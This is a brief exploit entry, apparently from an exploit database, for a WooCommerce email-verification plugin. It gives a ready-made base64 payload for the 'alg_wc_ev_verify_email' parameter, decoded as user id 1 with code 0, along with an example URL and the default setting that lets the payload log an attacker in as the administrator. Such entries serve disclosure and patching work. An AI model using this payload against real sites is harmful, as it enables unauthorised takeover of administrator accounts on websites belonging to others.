Share
## https://sploitus.com/exploit?id=WPEX-ID:10318
An attacker can manipulate $_GET['alg_wc_ev_verify_email'] and set this payload: eyJpZCI6MSwiY29kZSI6MH0=

Example: https://example.com/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=

after decoding payload: {"id":1,"code":0} (1 being the user_id of an administrator account)

The alg_wc_ev_redirect_to_my_account_on_success option of the plugin must be set to 'yes' (which is the default)